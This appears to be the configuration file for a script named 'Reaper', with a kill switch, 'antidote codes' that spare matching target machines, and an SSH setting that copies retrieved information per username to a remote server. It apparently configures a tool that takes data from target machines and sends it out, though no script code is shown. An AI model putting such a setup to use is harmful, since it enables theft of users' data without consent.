# ------- Kill switch -------
# true (will alow the script to run) or false (will stop the script from running)
Active=true 

# ------- Safety code -------
# if the code matches the one on the target  machnie the script wont run. ( recomend random 34 caracter codes )
Antidote_Codes= "Mgynz$fr=G!vTu4hYH4c*$pnY@rjHyTp7j", "9ut&zAvH4^wywubum6WGq#yvw6RVnV*JSj"

# ------- Reaper config -------
# ssh server copy function. [disabled by default]
TARGET_SERVER=[user]@[server]
TARGET_PORT=22 # default port is 22
TARGET_FOLDER=Reaper-info-retrieve/%USERNAME%/